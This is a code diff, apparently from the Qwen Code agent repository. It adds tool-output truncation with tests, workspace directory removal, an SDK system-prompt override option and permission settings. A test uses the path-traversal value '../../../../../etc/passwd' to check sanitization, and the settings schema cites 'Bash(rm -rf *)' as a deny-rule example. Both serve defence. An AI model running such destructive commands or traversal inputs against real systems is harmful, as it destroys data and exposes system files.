[CONTENT TRUNCATED] ...'); + + const truncatedPart = result.content.split( + 'Truncated part of the output:\n', + )[1]; + // Should stay within ~1.5x the threshold even with variable line lengths + expect(truncatedPart.length).toBeLessThan(THRESHOLD * 1.5); + }); + + it('should handle file write errors gracefully', async () => { + const content = 'a'.repeat(2_000_000); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockRejectedValue(new Error('File write failed')); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBeUndefined(); + expect(result.content).toContain( + '[Note: Could not save full output to file]', + ); + expect(mockWriteFile).toHaveBeenCalled(); + }); + + it('should save to correct file path with file name', async () => { + const content = 'a'.repeat(200_000); + const fileName = 'unique-file-123'; + const projectTempDir = '/custom/temp/dir'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + const expectedPath = path.join(projectTempDir, `${fileName}.output`); + expect(result.outputFile).toBe(expectedPath); + expect(mockWriteFile).toHaveBeenCalledWith(expectedPath, content); + }); + + it('should include helpful instructions in truncated message', async () => { + const content = 'a'.repeat(2_000_000); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain('The full output has been saved to:'); + expect(result.content).toContain( + 'To read the complete output, use the read_file 
tool with the absolute file path above', + ); + expect(result.content).toContain( + 'The truncated output below shows the beginning and end of the content', + ); + }); + + it('should sanitize fileName to prevent path traversal', async () => { + const content = 'a'.repeat(200_000); + const fileName = '../../../../../etc/passwd'; + const projectTempDir = '/tmp/safe_dir'; + + mockWriteFile.mockResolvedValue(undefined); + + await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + const expectedPath = path.join(projectTempDir, 'passwd.output'); + expect(mockWriteFile).toHaveBeenCalledWith(expectedPath, content); + }); +}); diff --git a/packages/core/src/utils/truncation.ts b/packages/core/src/utils/truncation.ts new file mode 100644 index 000000000..6672a1f83 --- /dev/null +++ b/packages/core/src/utils/truncation.ts @@ -0,0 +1,153 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as crypto from 'node:crypto'; +import { ReadFileTool } from '../tools/read-file.js'; +import type { Config } from '../config/config.js'; +import { logToolOutputTruncated } from '../telemetry/loggers.js'; +import { ToolOutputTruncatedEvent } from '../telemetry/types.js'; + +/** + * Truncates large tool output and saves the full content to a temp file. + * Used by the shell tool to prevent excessively large outputs from being + * sent to the LLM context. + * + * If content length is within the threshold, returns it unchanged. + * Otherwise, saves full content to a file and returns a truncated version + * with head/tail lines and a pointer to the saved file. 
+ *
+ * @param content Full tool output to inspect.
+ * @param fileName Base name for the saved file; only its basename is used
+ *   and `.output` is appended.
+ * @param projectTempDir Directory the full output is written to.
+ * @param threshold Maximum number of characters allowed before truncating;
+ *   also the character budget shared by the head, separator and tail.
+ * @param truncateLines Maximum number of lines allowed before truncating.
+ * @returns The original content when it is within both limits. Otherwise the
+ *   truncated content, plus `outputFile` when the full output was saved; if
+ *   the write fails, `outputFile` is omitted and a note is appended instead.
+ */
+export async function truncateAndSaveToFile(
+  content: string,
+  fileName: string,
+  projectTempDir: string,
+  threshold: number,
+  truncateLines: number,
+): Promise<{ content: string; outputFile?: string }> {
+  const lines = content.split('\n');
+
+  // Check both constraints: character threshold and line limit.
+  if (content.length <= threshold && lines.length <= truncateLines) {
+    return { content };
+  }
+
+  // Build head and tail within both line and character budgets.
+  const effectiveLines = Math.min(truncateLines, lines.length);
+  const headCount = Math.max(Math.floor(effectiveLines / 5), 1);
+  const tailCount = effectiveLines - headCount;
+  const separator = '\n\n---\n... [CONTENT TRUNCATED] ...\n---\n\n';
+  const ellipsis = '...';
+
+  // Collect head lines within budget. If a single line exceeds the
+  // remaining budget, include a truncated slice of it.
+  const headBudget = Math.floor(threshold / 5);
+  const beginning: string[] = [];
+  let headChars = 0;
+  for (let i = 0; i < Math.min(headCount, lines.length); i++) {
+    const remaining = headBudget - headChars;
+    if (remaining <= 0) break;
+    if (lines[i].length + 1 > remaining) {
+      const sliceLen = Math.max(remaining - ellipsis.length, 0);
+      beginning.push(lines[i].slice(0, sliceLen) + ellipsis);
+      headChars = headBudget;
+      break;
+    }
+    beginning.push(lines[i]);
+    headChars += lines[i].length + 1; // +1 for newline
+  }
+
+  // Collect tail lines within remaining budget. If a single line exceeds
+  // the remaining budget, include a truncated slice of it.
+  const tailBudget = Math.max(threshold - headChars - separator.length, 0);
+  const end: string[] = [];
+  let tailChars = 0;
+  const tailStart = Math.max(lines.length - tailCount, beginning.length);
+  for (let i = lines.length - 1; i >= tailStart; i--) {
+    const remaining = tailBudget - tailChars;
+    if (remaining <= 0) break;
+    if (lines[i].length + 1 > remaining) {
+      const sliceLen = Math.max(remaining - ellipsis.length, 0);
+      // Slice from an explicit start index: slice(-0) is slice(0) and would
+      // return the whole line when sliceLen is 0, blowing past the budget.
+      end.unshift(ellipsis + lines[i].slice(lines[i].length - sliceLen));
+      tailChars = tailBudget;
+      break;
+    }
+    end.unshift(lines[i]);
+    tailChars += lines[i].length + 1;
+  }
+
+  const truncatedContent = beginning.join('\n') + separator + end.join('\n');
+
+  // Sanitize fileName to prevent path traversal.
+  const safeFileName = `${path.basename(fileName)}.output`;
+  const outputFile = path.join(projectTempDir, safeFileName);
+  try {
+    await fs.writeFile(outputFile, content);
+
+    return {
+      content: `Tool output was too large and has been truncated.
+The full output has been saved to: ${outputFile}
+To read the complete output, use the ${ReadFileTool.Name} tool with the absolute file path above.
+The truncated output below shows the beginning and end of the content. The marker '... [CONTENT TRUNCATED] ...' indicates where content was removed.
+
+Truncated part of the output:
+${truncatedContent}`,
+      outputFile,
+    };
+  } catch (_error) {
+    // Best effort: still return the truncated content when the save fails.
+    return {
+      content:
+        truncatedContent + `\n[Note: Could not save full output to file]`,
+    };
+  }
+}
+
+/**
+ * High-level truncation helper that reads thresholds from Config,
+ * truncates if needed, saves full output to a temp file, and logs
+ * telemetry. Returns the (possibly truncated) content and an optional
+ * output file path.
+ *
+ * Callers no longer need to duplicate config extraction, file naming,
+ * or telemetry logging.
+ */ +export async function truncateToolOutput( + config: Config, + toolName: string, + content: string, +): Promise<{ content: string; outputFile?: string }> { + const threshold = config.getTruncateToolOutputThreshold(); + const lines = config.getTruncateToolOutputLines(); + + if (threshold <= 0 || lines <= 0) { + return { content }; + } + + const originalLength = content.length; + const fileName = `${toolName}_${crypto.randomBytes(6).toString('hex')}`; + const result = await truncateAndSaveToFile( + content, + fileName, + config.storage.getProjectTempDir(), + threshold, + lines, + ); + + if (result.outputFile) { + logToolOutputTruncated( + config, + new ToolOutputTruncatedEvent('', { + toolName, + originalContentLength: originalLength, + truncatedContentLength: result.content.length, + threshold, + lines, + }), + ); + } + + return result; +} diff --git a/packages/core/src/utils/workspaceContext.test.ts b/packages/core/src/utils/workspaceContext.test.ts index 686c50ba3..cf4cca2ea 100644 --- a/packages/core/src/utils/workspaceContext.test.ts +++ b/packages/core/src/utils/workspaceContext.test.ts @@ -412,3 +412,126 @@ describe('WorkspaceContext with optional directories', () => { expect(directories).toEqual([cwd, existingDir1]); }); }); + +describe('WorkspaceContext removeDirectory', () => { + let tempDir: string; + let cwd: string; + let addedDir: string; + let anotherDir: string; + + beforeEach(() => { + tempDir = fs.realpathSync( + fs.mkdtempSync(path.join(os.tmpdir(), 'workspace-context-remove-')), + ); + cwd = path.join(tempDir, 'project'); + addedDir = path.join(tempDir, 'added'); + anotherDir = path.join(tempDir, 'another'); + + fs.mkdirSync(cwd, { recursive: true }); + fs.mkdirSync(addedDir, { recursive: true }); + fs.mkdirSync(anotherDir, { recursive: true }); + }); + + afterEach(() => { + fs.rmSync(tempDir, { recursive: true, force: true }); + }); + + it('should remove a runtime-added directory', () => { + const ctx = new WorkspaceContext(cwd); + 
ctx.addDirectory(addedDir); + expect(ctx.getDirectories()).toContain(addedDir); + + const result = ctx.removeDirectory(addedDir); + expect(result).toBe(true); + expect(ctx.getDirectories()).not.toContain(addedDir); + }); + + it('should not remove the initial cwd directory', () => { + const ctx = new WorkspaceContext(cwd, [addedDir]); + // Only cwd is truly initial (non-removable) + const result = ctx.removeDirectory(cwd); + expect(result).toBe(false); + expect(ctx.getDirectories()).toContain(cwd); + }); + + it('should allow removing an additional directory passed at construction', () => { + const ctx = new WorkspaceContext(cwd, [addedDir]); + // additionalDirectories are NOT initial — they can be removed + const result = ctx.removeDirectory(addedDir); + expect(result).toBe(true); + expect(ctx.getDirectories()).not.toContain(addedDir); + }); + + it('should return false for non-existent directory', () => { + const ctx = new WorkspaceContext(cwd); + const result = ctx.removeDirectory('/non/existent/path'); + expect(result).toBe(false); + }); + + it('should notify listeners when a directory is removed', () => { + const ctx = new WorkspaceContext(cwd); + ctx.addDirectory(addedDir); + + const listener = vi.fn(); + ctx.onDirectoriesChanged(listener); + + ctx.removeDirectory(addedDir); + expect(listener).toHaveBeenCalledOnce(); + }); + + it('should not notify listeners when removal fails', () => { + const ctx = new WorkspaceContext(cwd); + + const listener = vi.fn(); + ctx.onDirectoriesChanged(listener); + + ctx.removeDirectory(addedDir); // not in workspace + expect(listener).not.toHaveBeenCalled(); + }); +}); + +describe('WorkspaceContext isInitialDirectory', () => { + let tempDir: string; + let cwd: string; + let additionalDir: string; + let runtimeDir: string; + + beforeEach(() => { + tempDir = fs.realpathSync( + fs.mkdtempSync(path.join(os.tmpdir(), 'workspace-context-initial-')), + ); + cwd = path.join(tempDir, 'project'); + additionalDir = path.join(tempDir, 
'additional'); + runtimeDir = path.join(tempDir, 'runtime'); + + fs.mkdirSync(cwd, { recursive: true }); + fs.mkdirSync(additionalDir, { recursive: true }); + fs.mkdirSync(runtimeDir, { recursive: true }); + }); + + afterEach(() => { + fs.rmSync(tempDir, { recursive: true, force: true }); + }); + + it('should return true for the initial cwd directory', () => { + const ctx = new WorkspaceContext(cwd); + expect(ctx.isInitialDirectory(cwd)).toBe(true); + }); + + it('should return false for an additional directory passed at construction', () => { + const ctx = new WorkspaceContext(cwd, [additionalDir]); + // additionalDirectories are no longer considered 'initial' + expect(ctx.isInitialDirectory(additionalDir)).toBe(false); + }); + + it('should return false for a runtime-added directory', () => { + const ctx = new WorkspaceContext(cwd); + ctx.addDirectory(runtimeDir); + expect(ctx.isInitialDirectory(runtimeDir)).toBe(false); + }); + + it('should return false for a directory not in the workspace', () => { + const ctx = new WorkspaceContext(cwd); + expect(ctx.isInitialDirectory('/some/random/path')).toBe(false); + }); +}); diff --git a/packages/core/src/utils/workspaceContext.ts b/packages/core/src/utils/workspaceContext.ts index 1b36f3650..5f052100d 100755 --- a/packages/core/src/utils/workspaceContext.ts +++ b/packages/core/src/utils/workspaceContext.ts @@ -31,10 +31,13 @@ export class WorkspaceContext { */ constructor(directory: string, additionalDirectories: string[] = []) { this.addDirectory(directory); + // Snapshot only the primary working directory as "initial" (non-removable). + // Additional directories (from settings / CLI flags) are added after + // the snapshot so they remain removable by the user. 
+ this.initialDirectories = new Set(this.directories); for (const additionalDirectory of additionalDirectories) { this.addDirectory(additionalDirectory); } - this.initialDirectories = new Set(this.directories); } /** @@ -112,6 +115,53 @@ export class WorkspaceContext { return Array.from(this.initialDirectories); } + /** + * Removes a directory from the workspace. + * Cannot remove initial directories (those set at construction time). + * @param directory The directory path to remove + * @returns True if the directory was removed, false if not found or is an initial directory + */ + removeDirectory(directory: string): boolean { + // Resolve to match the stored form + let resolved: string; + try { + resolved = this.resolveAndValidateDir(directory); + } catch { + // If we can't resolve it, try matching by raw string (e.g. directory was deleted) + resolved = path.isAbsolute(directory) + ? directory + : path.resolve(process.cwd(), directory); + } + + if (this.initialDirectories.has(resolved)) { + debugLogger.warn(`Cannot remove initial directory: ${resolved}`); + return false; + } + + if (!this.directories.has(resolved)) { + return false; + } + + this.directories.delete(resolved); + this.notifyDirectoriesChanged(); + return true; + } + + /** + * Checks whether a directory is an initial (non-removable) directory. + */ + isInitialDirectory(directory: string): boolean { + try { + const resolved = this.resolveAndValidateDir(directory); + return this.initialDirectories.has(resolved); + } catch { + const absolutePath = path.isAbsolute(directory) + ? 
directory + : path.resolve(process.cwd(), directory); + return this.initialDirectories.has(absolutePath); + } + } + setDirectories(directories: readonly string[]): void { const newDirectories = new Set(); for (const dir of directories) { diff --git a/packages/core/vendor/tree-sitter/tree-sitter-bash.wasm b/packages/core/vendor/tree-sitter/tree-sitter-bash.wasm new file mode 100755 index 000000000..214d0a73a Binary files /dev/null and b/packages/core/vendor/tree-sitter/tree-sitter-bash.wasm differ diff --git a/packages/core/vendor/tree-sitter/tree-sitter.wasm b/packages/core/vendor/tree-sitter/tree-sitter.wasm new file mode 100755 index 000000000..8f6156796 Binary files /dev/null and b/packages/core/vendor/tree-sitter/tree-sitter.wasm differ diff --git a/packages/sdk-typescript/README.md b/packages/sdk-typescript/README.md index 292a7550a..96e5db072 100644 --- a/packages/sdk-typescript/README.md +++ b/packages/sdk-typescript/README.md @@ -60,6 +60,7 @@ Creates a new query session with the Qwen Code. | `permissionMode` | `'default' \| 'plan' \| 'auto-edit' \| 'yolo'` | `'default'` | Permission mode controlling tool execution approval. See [Permission Modes](#permission-modes) for details. | | `canUseTool` | `CanUseTool` | - | Custom permission handler for tool execution approval. Invoked when a tool requires confirmation. Must respond within 60 seconds or the request will be auto-denied. See [Custom Permission Handler](#custom-permission-handler). | | `env` | `Record` | - | Environment variables to pass to the Qwen Code process. Merged with the current process environment. | +| `systemPrompt` | `string \| QuerySystemPromptPreset` | - | System prompt configuration for the main session. Use a string to fully override the built-in Qwen Code system prompt, or a preset object to keep the built-in prompt and append extra instructions. | | `mcpServers` | `Record` | - | MCP (Model Context Protocol) servers to connect. 
Supports external servers (stdio/SSE/HTTP) and SDK-embedded servers. External servers are configured with transport options like `command`, `args`, `url`, `httpUrl`, etc. SDK servers use `{ type: 'sdk', name: string, instance: Server }`. | | `abortController` | `AbortController` | - | Controller to cancel the query session. Call `abortController.abort()` to terminate the session and cleanup resources. | | `debug` | `boolean` | `false` | Enable debug mode for verbose logging from the CLI process. | @@ -247,6 +248,36 @@ const result = query({ }); ``` +### Override the System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Say hello in one sentence.', + options: { + systemPrompt: 'You are a terse assistant. Answer in exactly one sentence.', + }, +}); +``` + +### Append to the Built-in System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Review the current directory.', + options: { + systemPrompt: { + type: 'preset', + preset: 'qwen_code', + append: 'Be terse and focus on concrete findings.', + }, + }, +}); +``` + ### With SDK-Embedded MCP Servers The SDK provides `tool` and `createSdkMcpServer` to create MCP servers that run in the same process as your SDK application. This is useful when you want to expose custom tools to the AI without running a separate server process. 
diff --git a/packages/sdk-typescript/src/index.ts b/packages/sdk-typescript/src/index.ts index 4ae465975..805d03cfb 100644 --- a/packages/sdk-typescript/src/index.ts +++ b/packages/sdk-typescript/src/index.ts @@ -55,6 +55,8 @@ export type { PermissionMode, CanUseTool, PermissionResult, + QuerySystemPrompt, + QuerySystemPromptPreset, CLIMcpServerConfig, McpServerConfig, McpOAuthConfig, diff --git a/packages/sdk-typescript/src/query/createQuery.ts b/packages/sdk-typescript/src/query/createQuery.ts index 5ffcd1dda..42d332b15 100644 --- a/packages/sdk-typescript/src/query/createQuery.ts +++ b/packages/sdk-typescript/src/query/createQuery.ts @@ -7,7 +7,11 @@ import { serializeJsonLine } from '../utils/jsonLines.js'; import { ProcessTransport } from '../transport/ProcessTransport.js'; import { prepareSpawnInfo, type SpawnInfo } from '../utils/cliPath.js'; import { Query } from './Query.js'; -import type { QueryOptions } from '../types/types.js'; +import type { + QueryOptions, + QuerySystemPrompt, + TransportOptions, +} from '../types/types.js'; import { QueryOptionsSchema } from '../types/queryOptionsSchema.js'; import { SdkLogger } from '../utils/logger.js'; import { randomUUID } from 'node:crypto'; @@ -44,6 +48,7 @@ export function query({ // Generate or use provided session ID for SDK-CLI alignment const sessionId = options.resume ?? options.sessionId ?? 
randomUUID(); + const resolvedSystemPrompt = resolveSystemPromptOption(options.systemPrompt); const transport = new ProcessTransport({ pathToQwenExecutable, @@ -52,6 +57,7 @@ export function query({ model: options.model, permissionMode: options.permissionMode, env: options.env, + ...resolvedSystemPrompt, abortController, debug: options.debug, stderr: options.stderr, @@ -112,6 +118,20 @@ export function query({ return queryInstance; } +function resolveSystemPromptOption( + systemPrompt: QuerySystemPrompt | undefined, +): Pick { + if (!systemPrompt) { + return {}; + } + + if (typeof systemPrompt === 'string') { + return { systemPrompt }; + } + + return systemPrompt.append ? { appendSystemPrompt: systemPrompt.append } : {}; +} + function validateOptions(options: QueryOptions): SpawnInfo | undefined { const validationResult = QueryOptionsSchema.safeParse(options); if (!validationResult.success) { diff --git a/packages/sdk-typescript/src/transport/ProcessTransport.ts b/packages/sdk-typescript/src/transport/ProcessTransport.ts index a763a519c..fa55d0327 100644 --- a/packages/sdk-typescript/src/transport/ProcessTransport.ts +++ b/packages/sdk-typescript/src/transport/ProcessTransport.ts @@ -232,6 +232,14 @@ export class ProcessTransport implements Transport { args.push('--model', this.options.model); } + if (this.options.systemPrompt) { + args.push('--system-prompt', this.options.systemPrompt); + } + + if (this.options.appendSystemPrompt) { + args.push('--append-system-prompt', this.options.appendSystemPrompt); + } + if (this.options.permissionMode) { args.push('--approval-mode', this.options.permissionMode); } diff --git a/packages/sdk-typescript/src/types/queryOptionsSchema.ts b/packages/sdk-typescript/src/types/queryOptionsSchema.ts index 6781bb6dc..823bc7085 100644 --- a/packages/sdk-typescript/src/types/queryOptionsSchema.ts +++ b/packages/sdk-typescript/src/types/queryOptionsSchema.ts @@ -123,12 +123,29 @@ export const TimeoutConfigSchema = z.object({ streamClose: 
z.number().positive().optional(), }); +const QuerySystemPromptPresetSchema = z + .object({ + type: z.literal('preset'), + preset: z.literal('qwen_code'), + append: z + .string() + .min(1, 'systemPrompt.append must be a non-empty string') + .optional(), + }) + .strict(); + export const QueryOptionsSchema = z .object({ cwd: z.string().optional(), model: z.string().optional(), pathToQwenExecutable: z.string().optional(), env: z.record(z.string(), z.string()).optional(), + systemPrompt: z + .union([ + z.string().min(1, 'systemPrompt must be a non-empty string'), + QuerySystemPromptPresetSchema, + ]) + .optional(), permissionMode: z.enum(['default', 'plan', 'auto-edit', 'yolo']).optional(), canUseTool: z .custom((val) => typeof val === 'function', { diff --git a/packages/sdk-typescript/src/types/types.ts b/packages/sdk-typescript/src/types/types.ts index e726f4a2c..b532adc8f 100644 --- a/packages/sdk-typescript/src/types/types.ts +++ b/packages/sdk-typescript/src/types/types.ts @@ -16,6 +16,8 @@ export type TransportOptions = { model?: string; permissionMode?: PermissionMode; env?: Record; + systemPrompt?: string; + appendSystemPrompt?: string; abortController?: AbortController; debug?: boolean; stderr?: (message: string) => void; @@ -46,6 +48,14 @@ export type TransportOptions = { sessionId?: string; }; +export interface QuerySystemPromptPreset { + type: 'preset'; + preset: 'qwen_code'; + append?: string; +} + +export type QuerySystemPrompt = string | QuerySystemPromptPreset; + type ToolInput = Record; export type CanUseTool = ( @@ -226,6 +236,16 @@ export interface QueryOptions { */ env?: Record; + /** + * System prompt configuration for the Qwen CLI session. 
+ * + * - `string`: fully overrides the main session system prompt + * - `{ type: 'preset', preset: 'qwen_code', append?: string }`: + * uses Qwen Code's built-in prompt as the base and optionally appends extra + * instructions for the main session + */ + systemPrompt?: QuerySystemPrompt; + /** * Permission mode controlling how the SDK handles tool execution approval. * diff --git a/packages/sdk-typescript/test/unit/ProcessTransport.test.ts b/packages/sdk-typescript/test/unit/ProcessTransport.test.ts index 327166528..b5e6c19c0 100644 --- a/packages/sdk-typescript/test/unit/ProcessTransport.test.ts +++ b/packages/sdk-typescript/test/unit/ProcessTransport.test.ts @@ -196,6 +196,84 @@ describe('ProcessTransport', () => { ); }); + it('should pass systemPrompt through --system-prompt', () => { + mockPrepareSpawnInfo.mockReturnValue({ + command: 'qwen', + args: [], + type: 'native', + originalInput: 'qwen', + }); + mockSpawn.mockReturnValue(mockChildProcess); + + const options: TransportOptions = { + pathToQwenExecutable: 'qwen', + systemPrompt: 'You are a test system prompt.', + }; + + new ProcessTransport(options); + + expect(mockSpawn).toHaveBeenCalledWith( + 'qwen', + expect.arrayContaining([ + '--system-prompt', + 'You are a test system prompt.', + ]), + expect.any(Object), + ); + }); + + it('should pass appendSystemPrompt through --append-system-prompt', () => { + mockPrepareSpawnInfo.mockReturnValue({ + command: 'qwen', + args: [], + type: 'native', + originalInput: 'qwen', + }); + mockSpawn.mockReturnValue(mockChildProcess); + + const options: TransportOptions = { + pathToQwenExecutable: 'qwen', + appendSystemPrompt: 'Be extra concise.', + }; + + new ProcessTransport(options); + + expect(mockSpawn).toHaveBeenCalledWith( + 'qwen', + expect.arrayContaining(['--append-system-prompt', 'Be extra concise.']), + expect.any(Object), + ); + }); + + it('should pass both systemPrompt and appendSystemPrompt when provided', () => { + mockPrepareSpawnInfo.mockReturnValue({ + 
command: 'qwen', + args: [], + type: 'native', + originalInput: 'qwen', + }); + mockSpawn.mockReturnValue(mockChildProcess); + + const options: TransportOptions = { + pathToQwenExecutable: 'qwen', + systemPrompt: 'Override prompt', + appendSystemPrompt: 'Append prompt', + }; + + new ProcessTransport(options); + + expect(mockSpawn).toHaveBeenCalledWith( + 'qwen', + expect.arrayContaining([ + '--system-prompt', + 'Override prompt', + '--append-system-prompt', + 'Append prompt', + ]), + expect.any(Object), + ); + }); + it('should include --resume argument when provided', () => { mockPrepareSpawnInfo.mockReturnValue({ command: 'qwen', diff --git a/packages/sdk-typescript/test/unit/createQuery.test.ts b/packages/sdk-typescript/test/unit/createQuery.test.ts new file mode 100644 index 000000000..66b48e938 --- /dev/null +++ b/packages/sdk-typescript/test/unit/createQuery.test.ts @@ -0,0 +1,97 @@ +/** + * Unit tests for query() option mapping + */ + +import { describe, expect, it, vi, beforeEach } from 'vitest'; +import type { QueryOptions } from '../../src/query/createQuery.js'; + +const mockProcessTransport = vi.fn(); +const mockQuery = vi.fn(); +const mockPrepareSpawnInfo = vi.fn(); + +vi.mock('../../src/transport/ProcessTransport.js', () => ({ + ProcessTransport: mockProcessTransport, +})); + +vi.mock('../../src/query/Query.js', () => ({ + Query: mockQuery, +})); + +vi.mock('../../src/utils/cliPath.js', () => ({ + prepareSpawnInfo: mockPrepareSpawnInfo, +})); + +describe('query()', () => { + beforeEach(() => { + vi.clearAllMocks(); + + mockPrepareSpawnInfo.mockReturnValue(undefined); + mockProcessTransport.mockImplementation(() => ({ + write: vi.fn(), + readMessages: vi.fn(), + close: vi.fn(), + waitForExit: vi.fn(), + endInput: vi.fn(), + exitError: null, + })); + mockQuery.mockImplementation(() => ({ + initialized: Promise.resolve(), + getSessionId: () => 'test-session-id', + streamInput: vi.fn(), + })); + }); + + it('maps string systemPrompt to 
TransportOptions.systemPrompt', async () => { + const { query } = await import('../../src/query/createQuery.js'); + + query({ + prompt: 'hello', + options: { + systemPrompt: 'You are a strict reviewer.', + } satisfies QueryOptions, + }); + + expect(mockProcessTransport).toHaveBeenCalledWith( + expect.objectContaining({ + systemPrompt: 'You are a strict reviewer.', + }), + ); + }); + + it('maps preset systemPrompt append to TransportOptions.appendSystemPrompt', async () => { + const { query } = await import('../../src/query/createQuery.js'); + + query({ + prompt: 'hello', + options: { + systemPrompt: { + type: 'preset', + preset: 'qwen_code', + append: 'Be terse.', + }, + } satisfies QueryOptions, + }); + + const transportOptions = mockProcessTransport.mock.calls[0]?.[0]; + + expect(transportOptions.appendSystemPrompt).toBe('Be terse.'); + expect(transportOptions.systemPrompt).toBeUndefined(); + }); + + it('rejects non-qwen preset names at runtime validation', async () => { + const { query } = await import('../../src/query/createQuery.js'); + + expect(() => + query({ + prompt: 'hello', + options: { + systemPrompt: { + type: 'preset', + preset: 'claude_code', + append: 'Be terse.', + } as never, + } satisfies QueryOptions, + }), + ).toThrow(/systemPrompt/); + }); +}); diff --git a/packages/test-utils/package.json b/packages/test-utils/package.json index eadfec8cc..d4d5c1d85 100644 --- a/packages/test-utils/package.json +++ b/packages/test-utils/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code-test-utils", - "version": "0.12.3", + "version": "0.13.0", "private": true, "main": "src/index.ts", "license": "Apache-2.0", diff --git a/packages/vscode-ide-companion/README.md b/packages/vscode-ide-companion/README.md index 92eb830a6..3434f3684 100644 --- a/packages/vscode-ide-companion/README.md +++ b/packages/vscode-ide-companion/README.md @@ -63,7 +63,7 @@ We welcome contributions! 
See our [Contributing Guide](https://github.com/QwenLM ## Terms of Service and Privacy Notice -By installing this extension, you agree to the [Terms of Service](https://github.com/QwenLM/qwen-code/blob/main/docs/tos-privacy.md). +By installing this extension, you agree to the [Terms of Service](https://qwenlm.github.io/qwen-code-docs/en/users/support/tos-privacy/). ## License diff --git a/packages/vscode-ide-companion/package.json b/packages/vscode-ide-companion/package.json index 22f2a2bc5..a7c18ab4b 100644 --- a/packages/vscode-ide-companion/package.json +++ b/packages/vscode-ide-companion/package.json @@ -2,7 +2,7 @@ "name": "qwen-code-vscode-ide-companion", "displayName": "Qwen Code Companion", "description": "Enable Qwen Code with direct access to your VS Code workspace.", - "version": "0.12.3", + "version": "0.13.0", "publisher": "qwenlm", "icon": "assets/icon.png", "repository": { diff --git a/packages/vscode-ide-companion/schemas/settings.schema.json b/packages/vscode-ide-companion/schemas/settings.schema.json index d0eef6ae9..61734faaf 100644 --- a/packages/vscode-ide-companion/schemas/settings.schema.json +++ b/packages/vscode-ide-companion/schemas/settings.schema.json @@ -242,11 +242,6 @@ "type": "number", "default": -1 }, - "summarizeToolOutput": { - "description": "Settings for summarizing tool output.", - "type": "object", - "additionalProperties": true - }, "chatCompression": { "description": "Chat compression settings.", "type": "object", @@ -366,6 +361,33 @@ } } }, + "permissions": { + "description": "Permission rules controlling tool usage. Rules are evaluated in priority order: deny > ask > allow.", + "type": "object", + "properties": { + "allow": { + "description": "Tools or commands that are auto-approved without confirmation. Examples: \"ShellTool\", \"Bash(git *)\", \"ReadFileTool\".", + "type": "array", + "items": { + "type": "string" + } + }, + "ask": { + "description": "Tools or commands that always require user confirmation. 
Takes precedence over allow rules.", + "type": "array", + "items": { + "type": "string" + } + }, + "deny": { + "description": "Tools or commands that are always blocked. Highest priority rule. Examples: \"ShellTool\", \"Bash(rm -rf *)\".", + "type": "array", + "items": { + "type": "string" + } + } + } + }, "tools": { "description": "Settings for built-in and custom tools.", "type": "object", @@ -397,21 +419,21 @@ } }, "core": { - "description": "Paths to core tool definitions.", + "description": "Deprecated. Use permissions.allow instead.", "type": "array", "items": { "type": "string" } }, "allowed": { - "description": "A list of tool names that will bypass the confirmation dialog.", + "description": "Deprecated. Use permissions.allow instead.", "type": "array", "items": { "type": "string" } }, "exclude": { - "description": "Tool names to exclude from discovery.", + "description": "Deprecated. Use permissions.deny instead.", "type": "array", "items": { "type": "string" @@ -450,11 +472,6 @@ "type": "boolean", "default": true }, - "enableToolOutputTruncation": { - "description": "Enable truncation of large tool outputs.", - "type": "boolean", - "default": true - }, "truncateToolOutputThreshold": { "description": "Truncate tool output if it is larger than this many characters. Set to -1 to disable.", "type": "number", @@ -574,6 +591,51 @@ "type": "object", "additionalProperties": true }, + "agents": { + "description": "Settings for multi-agent collaboration features (Arena, Team, Swarm).", + "type": "object", + "properties": { + "displayMode": { + "description": "Display mode for multi-agent sessions. Currently only \"in-process\" is supported. Options: in-process", + "enum": [ + "in-process" + ] + }, + "arena": { + "description": "Settings for Arena (multi-model competitive execution).", + "type": "object", + "properties": { + "worktreeBaseDir": { + "description": "Custom base directory for Arena worktrees. 
Defaults to ~/.qwen/arena.", + "type": "string" + }, + "preserveArtifacts": { + "description": "When enabled, Arena worktrees and session state files are preserved after the session ends or the main agent exits.", + "type": "boolean", + "default": false + }, + "maxRoundsPerAgent": { + "description": "Maximum number of rounds (turns) each agent can execute. No limit if unset.", + "type": "number" + }, + "timeoutSeconds": { + "description": "Total timeout in seconds for the Arena session. No limit if unset.", + "type": "number" + } + } + }, + "team": { + "description": "Settings for Agent Team (role-based collaborative execution). Reserved for future use.", + "type": "object", + "additionalProperties": true + }, + "swarm": { + "description": "Settings for Agent Swarm (parallel sub-agent execution). Reserved for future use.", + "type": "object", + "additionalProperties": true + } + } + }, "hooksConfig": { "description": "Hook configurations for intercepting and customizing agent behavior.", "type": "object", @@ -600,18 +662,209 @@ "description": "Hooks that execute before agent processing. 
Can modify prompts or inject context.", "type": "array", "items": { - "type": "string" + "description": "A hook definition with an optional matcher and a list of hook configurations.", + "type": "object", + "properties": { + "matcher": { + "description": "An optional matcher pattern to filter when this hook definition applies.", + "type": "string" + }, + "sequential": { + "description": "Whether the hooks should be executed sequentially instead of in parallel.", + "type": "boolean" + }, + "hooks": { + "description": "The list of hook configurations to execute.", + "type": "array", + "items": { + "description": "A hook configuration entry that defines a command to execute.", + "type": "object", + "properties": { + "type": { + "description": "The type of hook.", + "type": "string", + "enum": [ + "command" + ] + }, + "command": { + "description": "The command to execute when the hook is triggered.", + "type": "string" + }, + "name": { + "description": "An optional name for the hook.", + "type": "string" + }, + "description": { + "description": "An optional description of what the hook does.", + "type": "string" + }, + "timeout": { + "description": "Timeout in milliseconds for the hook execution.", + "type": "number" + }, + "env": 